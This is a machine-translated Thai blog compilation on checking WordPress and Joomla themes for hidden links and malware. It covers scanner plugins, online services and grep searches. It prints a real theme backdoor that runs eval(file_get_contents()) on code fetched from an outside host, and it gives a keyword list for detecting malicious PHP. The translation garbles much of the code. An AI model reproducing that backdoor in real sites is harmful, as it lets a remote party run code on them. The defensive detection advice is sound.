จะป้องกันตัวเองจากลิงค์ที่ซ่อนอยู่และไวรัสในเทมเพลตสำหรับ Joomla และ WordPress ได้อย่างไร? ปลั๊กอิน TAC หรือวิธีตรวจสอบเทมเพลตสำหรับลิงก์ภายนอก วิธีตรวจสอบไวรัสในเทมเพลต Wordpress

สวัสดีเพื่อน. คุณแน่ใจหรือไม่ว่าเทมเพลต WordPress ฟรีที่คุณใช้สำหรับเว็บไซต์และบล็อกของคุณนั้นปลอดภัยจริง ๆ และไม่มีภัยคุกคามที่ซ่อนอยู่และรหัสที่เป็นอันตราย คุณแน่ใจอย่างสมบูรณ์เกี่ยวกับเรื่องนี้หรือไม่? อย่างแน่นอน?)

คุณคิดว่าพวกเขาเรียกใช้เทมเพลตจนเสร็จ ลบลิงก์ที่ซ่อนอยู่ออกจากเทมเพลต เท่านี้ก็เสร็จเรียบร้อย คุณสแกนไฟล์ไซต์เป็นระยะด้วยโปรแกรมป้องกันไวรัส ดูเครื่องมือของผู้ดูแลเว็บ Yandex ในแท็บความปลอดภัย และคุณจะเห็นข้อความที่นั่น: “ ไม่พบรหัสที่เป็นอันตรายบนเว็บไซต์«.

นั่นคือสิ่งที่ฉันคิดเช่นกัน ฉันไม่อยากทำให้คุณเสียใจ แต่...

รหัสอันตรายที่ซ่อนอยู่ในธีม WordPress ฟรี

นี่คือจดหมายที่ฉันได้รับเมื่อสัปดาห์ที่แล้วทางไปรษณีย์จากโฮสติ้งของฉัน เมื่อเร็ว ๆ นี้ พวกเขาได้แนะนำการตรวจสอบไฟล์ไซต์ทั้งหมดเป็นประจำเพื่อหาเนื้อหาที่เป็นอันตราย แต่พวกเขากลับพบเนื้อหานี้ในตัวฉัน!

ทุกอย่างเริ่มต้นด้วยความจริงที่ว่าวันหนึ่งฉันไปที่ไซต์ของฉันและไม่สามารถเปิดใช้งานได้ - คำจารึกที่ไม่เหมาะสมเกี่ยวกับไฟล์ที่ไม่พบที่มีนามสกุล php ออกมา ฉันไปศึกษาเนื้อหาของโฟลเดอร์กับไซต์บนโฮสติ้งและพบปัญหาทันที - ไฟล์เทมเพลต fuctions.php ของฉันถูกเปลี่ยนชื่อเป็น functions.php.malware ซึ่งบอกใบ้อย่างคลุมเครือ - โปรแกรมป้องกันไวรัสหรืออะไรทำนองนั้นทำงานที่นี่) เมื่อป้อนอีเมลแล้วฉันก็พบรายงานข้างต้นจากโฮสต์

แน่นอนว่าสิ่งแรกที่ฉันทำคือตรวจสอบ ไฟล์ที่กำหนดศึกษาเนื้อหา สแกนด้วยโปรแกรมป้องกันไวรัสต่างๆ มากมาย บริการออนไลน์เพื่อตรวจหาไวรัส ฯลฯ - ในท้ายที่สุด ฉันไม่พบอะไรเลย ทุกคนยืนยันเป็นเอกฉันท์ว่าไฟล์นั้นปลอดภัยอย่างสมบูรณ์ แน่นอน ฉันแสดงความสงสัยกับโฮสต์โดยบอกว่าคุณทำบางอย่างผิดพลาด แต่ในกรณีนี้ ฉันขอให้พวกเขาส่งรายงานเกี่ยวกับการค้นพบโค้ดที่เป็นอันตราย

และนี่คือสิ่งที่พวกเขาบอกฉัน

ฉันไปที่ google ข้อมูลเกี่ยวกับรหัสนี้และคิดอย่างจริงจังเกี่ยวกับมัน ...

วิธีค้นหาโค้ดที่เป็นอันตรายในเทมเพลต

เมื่อปรากฎว่านี่เป็นเคล็ดลับที่ไม่สำคัญซึ่งช่วยให้ผู้สนใจสามารถถ่ายโอนข้อมูลไปยังไซต์ของคุณและเปลี่ยนเนื้อหาของหน้าเว็บโดยที่คุณไม่รู้ตัว! หากคุณใช้เทมเพลตฟรี ฉันขอแนะนำให้ตรวจสอบ functions.php ของคุณสำหรับรหัสต่อไปนี้:

add_filter('the_content', '_bloginfo', 10001);
ฟังก์ชัน _bloginfo($เนื้อหา)(
โพสต์ทั่วโลก $;
ถ้า (is_single () && ( [ป้องกันอีเมล](get_option('blogoption'))) !== เท็จ)(
คืน $co;
) อย่างอื่นกลับ $content;
}

แม้ว่าฉันจะมีความรู้ด้าน php อย่างตื้นๆ แต่ก็ยังเห็นได้ว่ามีการสร้างตัวกรองบางอย่างที่เชื่อมโยงกับโพสต์ตัวแปรส่วนกลางและเนื้อหา ซึ่งมีหน้าที่รับผิดชอบในการแสดงเนื้อหาเฉพาะในหน้าโพสต์บล็อก (เงื่อนไข is_single) น่าสงสัยอยู่แล้วใช่ไหม? ทีนี้มาดูกันว่าสิ่งนี้จะแสดงอะไร รหัสที่กำหนดบนเว็บไซต์ของเรา

ตัวเลือกบล็อกที่น่าสนใจที่ร้องขอในฐานข้อมูลก็ดูน่าสงสัยเช่นกัน เราไปที่ฐานของเรา ข้อมูล MySQLและเราพบว่ามีตารางชื่อ wp_options หากคุณไม่ได้เปลี่ยนคำนำหน้า ก็จะมีลักษณะเช่นนี้ตามค่าเริ่มต้น และในนั้นเราพบบรรทัดที่เราสนใจที่เรียกว่า blogoption

อะไรสวย! เราเห็นตัวเลือกต่อไปนี้


ส่งคืน eval (file_get_contents ('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

เหล่านั้น. เราจากบางไซต์ (ยิ่งไปกว่านั้น รัสเซียด้วย) ส่งคืนเนื้อหาที่สามารถบรรทุกอะไรก็ได้! ลิงก์จำนวนเท่าใดก็ได้ รหัสที่เป็นอันตราย ข้อความที่ถูกแก้ไข ฯลฯ เมื่อเข้าถึงไซต์เองจะให้ข้อผิดพลาดในการเข้าถึง 403 ซึ่งไม่น่าแปลกใจ แน่นอน ฉันลบตัวเลือกนี้ออกจากฐานข้อมูลด้วย

จากข้อมูลของผู้ที่ตกเป็นเหยื่อ เนื้อหาของบทความของคุณมักจะถูกส่งคืนโดยมีการแก้ไขเพียงครั้งเดียว แทนที่จะเป็นจุด "." ลิงค์เปิดถูกปิดบังในข้อความ! อย่างไรก็ตาม ตัวเลือกนี้เขียนลงในฐานข้อมูลเมื่อติดตั้งเทมเพลตเอง จากนั้นโค้ดที่ทำสิ่งนี้จะทำลายตัวเองอย่างปลอดภัย และฉันใช้ชีวิตอยู่กับขยะแบบนี้มาสองปีแล้ว และไม่มีโปรแกรมป้องกันไวรัสหรือบริการใดเปิดเผยให้ฉันเห็น ภัยคุกคามนี้ตลอดเวลานั้น พูดตามตรง ฉันไม่ได้สังเกตว่าเทคนิคนี้เคยได้ผลกับฉันหรือไม่ หรือปลั๊กอินความปลอดภัยของฉันปิดกั้นความเป็นไปได้นี้ (หรือบางทีหนึ่งในการอัปเดต WordPressa ปิดช่องโหว่นี้) แต่ก็ยังไม่เป็นที่พอใจ

คุณธรรมของชีสฟรี

คุณชอบความซับซ้อนของ "ผู้แปล" เทมเพลตของเรา (หรือผู้ที่โพสต์ไว้ในแคตตาล็อก) อย่างไร คุณไม่จำเป็นต้องตัดลิงก์ออกจากส่วนท้าย) น่าเสียดายที่ฉันจำไม่ได้ว่าดาวน์โหลดเทมเพลตจากที่ใด มันนานมาแล้ว ไม่เช่นนั้นฉันคงเขียนข้อความที่น่ารักสองสามอัน และถ้าตอนนั้นฉันมีประสบการณ์แบบเดียวกับตอนนี้ ฉันจะไม่ใช้เทมเพลตฟรีหรือในกรณีที่รุนแรง ฉันจะไม่ดาวน์โหลดจากแหล่งที่ไม่รู้จักอย่างแน่นอน!

ง่ายกว่าที่จะซื้อเทมเพลตพรีเมียมอย่างเป็นทางการในราคา 15-20 เหรียญสำหรับเทมเพลตเดียวกันและใช้ชีวิตอย่างสงบสุขโดยรู้ว่าไม่มีช่องโหว่และลิงก์ที่เข้ารหัส และแม้ว่าจะมีช่องโหว่ นักพัฒนาซอฟต์แวร์จะปล่อยการอัปเดตอย่างแน่นอน รูเหล่านี้จะถูกปิด ( อย่างไรก็ตาม Artem เพิ่งเผยแพร่บทความที่เขาเพิ่งพูดถึงเทมเพลตพรีเมียมและแจกรหัสส่งเสริมการขายสำหรับส่วนลดสุดโหดสำหรับผู้ที่สนใจ)

WordPress เป็นเครื่องมือยอดนิยมสำหรับการสร้างเว็บไซต์และบล็อกข้อมูลต่างๆ ความปลอดภัยของเว็บไซต์ของคุณเป็นมากกว่าความปลอดภัยของข้อมูลของคุณ สิ่งนี้สำคัญกว่ามาก เนื่องจากเป็นความปลอดภัยของผู้ใช้ทุกคนที่อ่านแหล่งข้อมูลของคุณและไว้วางใจ ด้วยเหตุนี้จึงเป็นสิ่งสำคัญมากที่ไซต์จะไม่ติดไวรัสหรือรหัสที่เป็นอันตรายอื่นใด

เราจะพูดถึงวิธีการปกป้อง WordPress จากการแฮ็กในบทความต่อไปนี้ แต่ตอนนี้ฉันอยากจะบอกคุณถึงวิธีตรวจสอบไซต์ WordPress ของคุณเพื่อหาไวรัสและรหัสที่เป็นอันตรายเพื่อให้แน่ใจว่าทุกอย่างปลอดภัย

ตัวเลือกแรกที่นึกถึงก็คือแฮ็กเกอร์ได้แฮ็กคุณและสร้างแบ็คดอร์ในโค้ดไซต์ของคุณ เพื่อให้สามารถส่งสแปม ใส่ลิงก์ และสิ่งไม่ดีอื่นๆ เหตุการณ์นี้อาจเกิดขึ้นได้ในบางครั้ง แต่จะเกิดขึ้นได้ยากหากคุณอัปเดตซอฟต์แวร์ตรงเวลา

มีธีมและปลั๊กอิน WordPress ฟรีหลายพันรายการและนี่คือจุดที่อันตรายอยู่ เป็นสิ่งหนึ่งเมื่อคุณดาวน์โหลดเทมเพลตจากไซต์ WordPress และอีกสิ่งหนึ่งเมื่อคุณพบในไซต์ด้านซ้าย นักพัฒนาที่ไร้ยางอายสามารถฝังโค้ดที่เป็นอันตรายต่างๆ ลงในผลิตภัณฑ์ของตนได้ มีความเสี่ยงมากขึ้นหากคุณดาวน์โหลดเทมเพลตพรีเมียมฟรี ซึ่งแฮ็กเกอร์สามารถเพิ่มช่องโหว่ด้านความปลอดภัยบางประเภทโดยไม่ต้องเสี่ยงอะไรเลย ซึ่งพวกเขาสามารถเจาะทะลุและทำในสิ่งที่ต้องการได้ นั่นเป็นเหตุผลว่าทำไมการตรวจสอบไวรัสในไซต์ wordpress ของคุณจึงเป็นเรื่องสำคัญ

ตรวจสอบเว็บไซต์ wordpress เพื่อหาไวรัส

สิ่งแรกที่ต้องดูเมื่อตรวจสอบไซต์ไม่ใช่ไวรัส แต่เป็นปลั๊กอิน WordPress คุณสามารถสแกนไซต์ของคุณอย่างรวดเร็วและง่ายดายและค้นหาส่วนที่น่าสงสัยของโค้ดที่ควรค่าแก่การค้นหา ไม่ว่าจะเป็นในธีม ปลั๊กอิน หรือแกนหลักของ Wodpress เอง มาดูปลั๊กอินยอดนิยมบางตัวกัน:

1.ทค

ปลั๊กอินที่เรียบง่ายนี้จะตรวจสอบธีมทั้งหมดที่ติดตั้งบนไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ปลั๊กอินตรวจจับลิงก์ที่ซ่อนอยู่ซึ่งเข้ารหัสด้วยการแทรกรหัส base64 และแสดงผลด้วย รายละเอียดข้อมูลเกี่ยวกับปัญหาที่พบ ส่วนใหญ่แล้ว ส่วนต่างๆ ของโค้ดที่พบไม่ใช่ไวรัส แต่อาจเป็นอันตรายได้ ดังนั้นคุณควรใส่ใจกับสิ่งเหล่านี้

เปิด "รูปร่าง" -> "แทค"จากนั้นรอจนครบทุกหัวข้อ

2.VIP สแกนเนอร์

คล้ายกับเครื่องสแกนหัวข้อ TOC มาก แต่มีข้อมูลที่ละเอียดกว่า โอกาสเดียวกันในการตรวจจับลิงก์ โค้ดที่ซ่อนอยู่ และการแทรกที่เป็นอันตรายอื่นๆ เพียงเปิดรายการ VIP Scanner ในส่วนเครื่องมือและวิเคราะห์ผลลัพธ์

การลบไฟล์ที่ไม่จำเป็นเช่น desktop.ini อาจเพียงพอแล้ว หรือคุณต้องดูให้ละเอียดยิ่งขึ้นว่าเกิดอะไรขึ้นในไฟล์โดยใช้ base64

3. แอนตี้มัลแวร์จาก GOTMLS.NET

ปลั๊กอินนี้ไม่เพียงแต่ช่วยให้คุณสแกนธีมและคอร์ของไซต์เพื่อหาไวรัสเท่านั้น แต่ยังช่วยปกป้องไซต์จากการใช้รหัสผ่านอย่างดุร้ายและการโจมตี XSS, SQLInj ต่างๆ การค้นหาจะดำเนินการตามลายเซ็นและช่องโหว่ที่รู้จัก ช่องโหว่บางอย่างสามารถแก้ไขได้ ในการเริ่มสแกนไฟล์ให้เปิด "ต่อต้านมัลแวร์"ในแถบด้านข้างแล้วคลิก "เรียกใช้การสแกน":

ก่อนที่คุณจะเรียกใช้การสแกน คุณต้องอัปเดตฐานข้อมูลลายเซ็น

4. คำพูด

นี่เป็นหนึ่งในปลั๊กอินความปลอดภัยและการสแกนมัลแวร์ของ WordPress ที่ได้รับความนิยมสูงสุด นอกจากสแกนเนอร์ซึ่งสามารถค้นหาบุ๊กมาร์กส่วนใหญ่ในโค้ด WordPress แล้ว ยังมีการป้องกันตามเวลาจริงอีกด้วย ชนิดต่างๆการโจมตีและการโจมตีด้วยกำลังดุร้าย ในระหว่างการค้นหา ปลั๊กอินจะพบ ปัญหาที่เป็นไปได้พร้อมปลั๊กอินและธีมต่างๆ บอกให้คุณอัปเดต WordPress

เปิดแท็บ "กลาโหม WP"ในแถบด้านข้าง จากนั้นไปที่แท็บ "สแกน"และกด "เริ่มสแกน":

การสแกนอาจใช้เวลา เวลาที่แน่นอนแต่เมื่อเสร็จสิ้น คุณจะเห็นรายงานโดยละเอียดเกี่ยวกับปัญหาที่พบ

5.แอนตี้ไวรัส

นี่เป็นอีกหนึ่งปลั๊กอินง่ายๆ ที่จะสแกนเทมเพลตเว็บไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ข้อเสียคือสแกนเฉพาะเทมเพลตปัจจุบัน แต่ข้อมูลจะแสดงในรายละเอียดเพียงพอ คุณจะเห็นฟีเจอร์อันตรายทั้งหมดที่ธีมมี จากนั้นคุณสามารถวิเคราะห์โดยละเอียดได้ว่าฟีเจอร์เหล่านี้ก่อให้เกิดอันตรายหรือไม่ ค้นหารายการ "แอนตี้ไวรัส"ในการตั้งค่าแล้วคลิก "สแกนเทมเพลตธีมทันที":

6. ตัวตรวจสอบความสมบูรณ์

ขอแนะนำให้ตรวจสอบความสมบูรณ์ด้วย ไฟล์เวิร์ดเพรสในกรณีที่ไวรัสได้ลงทะเบียนไว้ที่ใดที่หนึ่งแล้ว ในการทำเช่นนี้ คุณสามารถใช้ปลั๊กอินตัวตรวจสอบความสมบูรณ์ ตรวจสอบไฟล์หลัก ปลั๊กอิน และเทมเพลตทั้งหมดสำหรับการเปลี่ยนแปลง ในตอนท้ายของการสแกน คุณจะเห็นข้อมูลเกี่ยวกับไฟล์ที่แก้ไข

บริการออนไลน์

นอกจากนี้ยังมีบริการออนไลน์หลายอย่างที่ให้คุณตรวจสอบไซต์ wordpress เพื่อหาไวรัสหรือเพียงแค่ตรวจสอบเทมเพลต นี่คือบางส่วนของพวกเขา:

themecheck.org- คุณดาวน์โหลดไฟล์เก็บถาวรของธีมและสามารถดูคำเตือนทั้งหมดเกี่ยวกับฟังก์ชันที่อาจเป็นอันตรายที่ใช้ในนั้น คุณไม่สามารถดูข้อมูลเกี่ยวกับธีมของคุณเท่านั้น แต่ยังสามารถดูเกี่ยวกับธีมอื่น ๆ ที่อัปโหลดโดยผู้ใช้รายอื่นได้อีกด้วย รุ่นต่างๆหัวข้อ ทุกสิ่งที่ปลั๊กอินค้นหาสามารถพบได้ในไซต์นี้ การตรวจสอบ ธีมเวิร์ดเพรสก็มีความสำคัญมากเช่นกัน

virustotal.com- แหล่งข้อมูลที่รู้จักกันดีซึ่งคุณสามารถตรวจสอบไซต์หรือไฟล์เทมเพลตของคุณเพื่อหาไวรัส

ReScan.pro- ตรวจสอบไซต์ WordPress เพื่อหาไวรัสโดยใช้บริการนี้ได้ฟรี การวิเคราะห์แบบคงที่และไดนามิกจะดำเนินการเพื่อตรวจหาการเปลี่ยนเส้นทางที่เป็นไปได้ เครื่องสแกนจะเปิดหน้าต่างๆ ของไซต์ ตรวจสอบไซต์กับบัญชีดำต่างๆ

sitecheck.sucuri.net- บริการง่ายๆ สำหรับสแกนไซต์และธีมสำหรับไวรัส มีปลั๊กอินสำหรับ WordPress ตรวจจับลิงก์และสคริปต์ที่เป็นอันตราย

ตรวจสอบด้วยตนเอง

ไม่มีอะไรจะดีไปกว่าการยืนยันด้วยตนเอง ลีนุกซ์มียูทิลิตี้ grep ที่ยอดเยี่ยมที่ให้คุณค้นหาการเกิดขึ้นของสตริงตามอำเภอใจในโฟลเดอร์ที่มีไฟล์ ยังคงต้องเข้าใจว่าเราจะมองหาอะไร:

eval - ฟังก์ชั่นนี้ให้คุณดำเนินการตามอำเภอใจ รหัส php.iniไม่ได้ใช้โดยผลิตภัณฑ์ที่เคารพตนเอง หากหนึ่งในปลั๊กอินหรือธีมใช้ฟังก์ชันนี้ เกือบ 100% แน่ใจว่ามีไวรัสอยู่ที่นั่น

  • base64_decode- ฟังก์ชันการเข้ารหัสสามารถใช้กับ eval เพื่อซ่อนรหัสที่เป็นอันตรายได้ แต่สามารถใช้เพื่อวัตถุประสงค์ที่ไม่สงบได้ ดังนั้นโปรดใช้ความระมัดระวัง
  • sha1- วิธีอื่นในการเข้ารหัสรหัสที่เป็นอันตราย
  • gzinflate- ฟังก์ชันการบีบอัด เป้าหมายเดียวกัน พร้อมด้วย eval เช่น gzinflate(base64_decode(code)
  • สเตรฟ- พลิกสตริงไปข้างหลังก่อนเนื่องจากสามารถใช้ตัวแปรสำหรับการเข้ารหัสดั้งเดิมได้
  • พิมพ์- การพิมพ์ข้อมูลไปยังเบราว์เซอร์ร่วมกับ gzinflate หรือ base64_decode นั้นเป็นอันตราย
  • file_put_contents- WordPress เองหรือปลั๊กอินยังคงสามารถสร้างไฟล์ในระบบไฟล์ได้ แต่ถ้าธีมสร้างได้ คุณควรระวังและตรวจสอบว่าเหตุใดจึงต้องใช้ เนื่องจากไวรัสสามารถติดตั้งได้
  • file_get_contents- ในกรณีส่วนใหญ่จะใช้เพื่อจุดประสงค์ทางสันติ แต่สามารถใช้เพื่อดาวน์โหลดรหัสที่เป็นอันตรายหรืออ่านข้อมูลจากไฟล์
  • ขด- เรื่องเดียวกัน
  • เปิด- เปิดไฟล์เพื่อเขียน คุณไม่มีทางรู้ว่าอะไร;
  • ระบบ- ฟังก์ชั่นรันคำสั่งในระบบ Linux หากทำโดยธีม ปลั๊กอิน หรือเวิร์ดเพรสเอง เป็นไปได้มากว่าจะมีไวรัส
  • ลิงค์สัญลักษณ์- สร้างลิงก์สัญลักษณ์ในระบบ บางทีไวรัสอาจพยายามสร้างลิงก์หลัก ระบบไฟล์หาได้จากภายนอก
  • สำเนา- คัดลอกไฟล์จากที่หนึ่งไปยังอีกที่หนึ่ง
  • รับcwd- ส่งคืนชื่อไดเร็กทอรีการทำงานปัจจุบัน
  • ใบสั่ง- เปลี่ยนไดเร็กทอรีการทำงานปัจจุบัน
  • ini_get- รับข้อมูลเกี่ยวกับการตั้งค่า PHP บ่อยครั้งเพื่อจุดประสงค์ที่สันติ แต่คุณไม่มีทางรู้
  • error_reporting(0)- ปิดใช้งานเอาต์พุตของข้อความแสดงข้อผิดพลาด
  • window.top.location.href- ฟังก์ชันจาวาสคริปต์ใช้สำหรับเปลี่ยนเส้นทางไปยังหน้าอื่น
  • ถูกแฮ็ก- ดังนั้นในกรณีที่เราตรวจสอบทันใดนั้นแฮ็กเกอร์ก็ตัดสินใจบอกเรา

คุณสามารถแทนที่แต่ละคำในคำสั่งดังนี้:

grep -R "แฮ็ก" /var/www/path/to/files/wordpress/wp-content/

หรือใช้สคริปต์ง่าย ๆ ที่จะค้นหาคำทั้งหมดในครั้งเดียว:

ค่า = "base64_decode (
eval(base64_decode
gzinflate (ฐาน 64_decode (
getcwd();
สเตรฟ(
chr(หรือ(
ใบสั่ง
ini_get
window.top.location.href
สำเนา(
อีวาล(
ระบบ(
ซิมลิงค์(
error_reporting(0)
พิมพ์
file_get_contents(
file_put_contents(
เปิด(
ถูกแฮ็ก"

ซีดี /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

สวัสดีเพื่อน ๆ Idea Fox!

ฉันไม่รู้เกี่ยวกับคุณ แต่ฉันนอนไม่หลับตอนกลางคืน ปัญหาด้านความปลอดภัยของบล็อกทำให้ฉันทรมาน ไม่มีอำนาจอีกต่อไป :-)

ฉันอ่านบล็อกจำนวนมากในหัวข้อนี้และทดสอบปลั๊กอินจำนวนมากที่ช่วยแก้ปัญหานี้ ใช่และพวกเขาเริ่มถามคำถามในหัวข้อการปกป้องไซต์ในความคิดเห็นซึ่งทำให้ฉันเขียนบันทึกนี้

แค่จินตนาการว่าคุณกำลังเขียนบล็อก เขียนบทความ พยายาม ... และไอ้ชั่วก็มาทำลายเว็บไซต์ของคุณ ฉันคิดว่าจะต้องผิดหวังมากแน่ๆ

ท้ายที่สุดบล็อกเกอร์ทั่วไปทุกคนลงทุนเวลาและความพยายามอย่างมากในการพัฒนาเว็บไซต์ของเขา และสำหรับหลาย ๆ คน การเขียนบล็อกมักจะกลายเป็นความหลงใหล ... ต่อไปนี้และต่อไป หากสิ่งนี้เกิดขึ้น :-)

คุณเข้าใจดีว่าสิ่งนี้สำคัญเพียงใด

เรามาเริ่มธุรกิจกันเถอะ :)

สองสามเดือนที่ผ่านมาฉันได้เขียนบันทึกเกี่ยวกับการแฮ็ค อย่าลืมอ่านมัน แต่เวลาผ่านไปนานมากแล้ว และฉันได้ใช้มาตรการเพิ่มเติมเพื่อเสริมสร้างการป้องกันรอบด้าน

ในบันทึกต่อไปนี้ ฉันจะพูดถึงปัญหานี้โดยละเอียดอย่างแน่นอน (ฉันยังจำและเขียนเกี่ยวกับการตั้งค่า ISP)

3. เราตรวจสอบเว็บไซต์ในบริการออนไลน์อื่นๆ

บริการดังกล่าวหย่าร้างกันจนสุดลูกหูลูกตา ฉันมีความคิดเห็นที่ชัดเจนว่าหลายคนโง่เขลาและสร้างขึ้นเพื่อแสดงโฆษณาเท่านั้น

หมอเว็บ

DR.Web ทำขึ้น บริการที่ดีเพื่อตรวจสอบเว็บไซต์ออนไลน์ โดยส่วนตัวแล้วเขาเคยช่วยฉันค้นหาการติดไวรัสจากเพื่อนในบล็อก (มีรหัสของบุคคลที่สามอยู่ในไฟล์ .htaccess)

การตรวจสอบนั้นง่ายมาก ป้อน URL ของคุณและรอผลการตรวจสอบ

antivirus-alarm.com

โปรแกรมรวบรวมข้อมูลเว็บไซต์ที่มีประสิทธิภาพซึ่งใช้มากถึง 43 ฐานข้อมูลป้องกันไวรัสจากบริษัทแอนตี้ไวรัสชั้นนำของโลก

ที่นี่เช่นกันทุกอย่างง่ายมาก เราขับรถไปที่ URL ของไซต์ของเราและเรากำลังรอผลการสแกนด้วยลมหายใจซึ้งน้อยลง

นี่คือสิ่งที่ฉันรอคอย

ทุกอย่างสะอาด คุณสามารถนอนหลับได้อย่างสงบสุข :-)

ทั้งหมดนี้เป็นสิ่งที่ดีอย่างแน่นอน แต่คุณต้องติดตั้งปลั๊กอินสองสามตัวที่ไม่รบกวนบล็อก WordPress เลย

4. ขอให้โฮสต์ตรวจสอบไซต์ของคุณ

ความจริงก็คือโฮสต์กังวลเกี่ยวกับปัญหาด้านความปลอดภัยมากกว่าคุณและมีเครื่องมือป้องกันที่มีประสิทธิภาพ และวิธีการป้องกันเฉพาะทาง

นี่คือข่าวของฉันสำหรับคุณในวันนี้ ต่อไปจะพูดถึง ปลั๊กอินที่มีประสิทธิภาพซึ่งช่วยให้คุณสามารถปกป้องบล็อก WordPress ของคุณจากการแฮ็คได้อย่างมาก

ฉันทำงานกับเขามา 2 เดือนแล้วและฉันก็พอใจกับเขามาก จนถึงตอนนี้ฉันจัดการกับเขา 3 ครั้งและห้ามตัวเอง: -) สรุปคือมีอะไรจะบอก

หนึ่งใน เหตุการณ์สำคัญเมื่อสร้างบล็อก - เลือกเทมเพลตคุณภาพสูง มีหลายไซต์ทั้งแบบเสียเงินและแบบฟรี อย่างไรก็ตาม คุณต้องระวังที่นี่ เนื่องจากมีโอกาสสูงที่คุณจะได้รับไวรัส สคริปต์ที่เป็นอันตราย และลิงก์ที่ซ่อนอยู่พร้อมกับไฟล์

แต่แม้ว่าเทมเพลตจะสะอาดในแง่ของความปลอดภัย และการออกแบบ การใช้งาน และฟังก์ชันการทำงานที่เหมาะกับคุณอย่างสมบูรณ์ แต่ก็ไม่ได้หมายความว่าทุกอย่างจะเป็นไปตามลำดับ ธีมต้องมีโค้ด HTML และ CSS ที่ถูกต้อง รวมทั้งเป็นไปตามมาตรฐานทั้งหมด ซีเอ็มเอส เวิร์ดเพรส. แม้แต่ธีมที่ต้องชำระเงินและเทมเพลตแบบกำหนดเองก็ยังมีปัญหากับรูปแบบหลัง

ผู้พัฒนาเอ็นจิ้นกำลังพัฒนามันอย่างต่อเนื่อง และผู้สร้างเทมเพลทก็ไม่ได้ตามทันพวกเขาเสมอไป โดยใช้ฟังก์ชันที่เลิกใช้แล้วเมื่อสร้างมันขึ้นมา

วันนี้ฉันจะแสดงให้คุณเห็น 2 วิธีในการตรวจสอบธีม WordPress ว่าเป็นไปตามมาตรฐานหรือไม่ เครื่องมือเหล่านี้ใช้เมื่อมีการเพิ่มลงในไดเร็กทอรีทางการ https://wordpress.org/themes/

บริการตรวจสอบธีม WordPress และ Joomla templates ว่าเป็นไปตามมาตรฐาน

ThemeCheck.org คือ บริการฟรีซึ่งช่วยให้คุณตรวจสอบความปลอดภัยและคุณภาพของเทมเพลตสำหรับ CMS WordPress และ Joomla ก่อนติดตั้งบนเว็บไซต์

หากต้องการตรวจสอบธีม ให้อัปโหลดไฟล์เก็บถาวรจากคอมพิวเตอร์ของคุณโดยคลิกปุ่ม "เลือกไฟล์" บนเว็บไซต์ themecheck.org หากคุณไม่ต้องการให้บันทึกผลการสแกนในบริการและให้บริการแก่ผู้ใช้รายอื่น ให้ทำเครื่องหมายที่ “ ลืมข้อมูลที่อัปโหลดหลังจากผลลัพธ์“. ตอนนี้กดปุ่ม "ส่ง"

ตัวอย่างเช่นฉันเอาหัวข้อ อินเตอร์เฟซดาวน์โหลดจากเว็บไซต์อย่างเป็นทางการ 99 จาก 100 - 0 ข้อผิดพลาดที่สำคัญและคำเตือน 1 ครั้ง นี่เป็นผลลัพธ์ที่ดีมาก

ในการเปรียบเทียบ เทมเพลตบล็อกของฉันได้รับคะแนน 0 (ข้อผิดพลาด 14 รายการและคำเตือน 23 รายการ) ฉันคิดว่าสำหรับหลาย ๆ คน ผลลัพธ์จะไม่แตกต่างกันมากนัก โดยเฉพาะอย่างยิ่งหากหัวข้อนั้นล้าสมัยไปแล้ว ความคิดเห็นทั้งหมดพร้อมคำอธิบาย ระบุไฟล์และบรรทัดที่พบ อยู่ในหน้าเดียวกันด้านล่าง

ตรงไปตรงมาฉันไม่เข้าใจมากนักมันจะมีประโยชน์มากกว่าสำหรับผู้เขียนและฉันจะเปลี่ยนเทมเพลตได้ง่ายกว่าการแก้ไขทุกอย่าง ฉันแค่ไม่รู้ว่าเมื่อไหร่ฉันจะไปถึงที่นั่น

หน้าแรกมีชุดรูปแบบเว็บ WordPress และ Joomla ที่ทดสอบก่อนหน้านี้ให้เลือกมากมายพร้อมความสามารถในการจัดเรียงตามเวลาที่เพิ่มหรือจัดอันดับ เมื่อคุณคลิกที่สิ่งเหล่านี้ คุณจะเห็นข้อมูลโดยละเอียดและลิงก์ไปยังเว็บไซต์ของผู้เขียนและหน้าดาวน์โหลด

หากคุณเป็นผู้พัฒนาและธีมของคุณถูกต้อง 100% คุณสามารถแจ้งให้ผู้ใช้ทราบได้โดยตั้งค่าตราคะแนนพิเศษบนนั้น

คุณค่าของบริการ ThemeCheck.org คือเว็บมาสเตอร์สามารถใช้เพื่อเลือกธีมที่มีคุณภาพก่อนที่จะติดตั้งในบล็อก

ปลั๊กอินตรวจสอบธีม

คุณสามารถตรวจสอบเทมเพลตที่ติดตั้งไว้แล้วว่าเข้ากันได้กับมาตรฐานล่าสุดของ WordPress โดยใช้ปลั๊กอินตรวจสอบธีม ลิ้งค์ดาวน์โหลด รุ่นล่าสุด: https://wordpress.org/plugins/theme-check/

ฟังก์ชันการทำงานของปลั๊กอินคล้ายกับบริการที่ฉันอธิบายไว้ข้างต้น ไม่จำเป็นต้องทำการตั้งค่าใดๆ หลังจากติดตั้งและเปิดใช้งานมาตรฐานแล้ว ตรวจสอบการสั่งซื้อ:

  1. ไปที่แผงการดูแลระบบในหน้าเมนู “ ลักษณะที่ปรากฏ"-" ตรวจสอบธีม"
  2. เลือกธีมที่ต้องการจากรายการดรอปดาวน์ หากมีการติดตั้งไว้หลายรายการ
  3. ทำเครื่องหมายที่ช่อง “ระงับ INFO” หากคุณไม่ต้องการส่งข้อมูล
  4. คลิกปุ่ม "ตรวจสอบ"

ผลลัพธ์จะแสดงในหน้าเดียวกัน

อย่างที่คุณเห็น ธีมเริ่มต้น ยี่สิบสิบก็ไม่เหมาะเช่นกัน แต่ตัวอย่างเช่น ยี่สิบสี่ไม่มีข้อผิดพลาด

หลังจากตรวจสอบปลั๊กอินแล้ว คุณสามารถปิดใช้งานได้ และควรลบออกพร้อมกันจนกว่าจะถึงครั้งต่อไป

บทสรุป.ก่อนติดตั้งเทมเพลต WordPress ใหม่ ไม่เพียงตรวจสอบ ลิงค์ที่ซ่อนอยู่และรหัสที่เป็นอันตรายด้วยปลั๊กอิน TAC แต่ยังรวมถึงบริการ ThemeCheck.org หรือปลั๊กอิน Theme Check เพื่อให้สอดคล้องกับมาตรฐาน CMS ล่าสุด

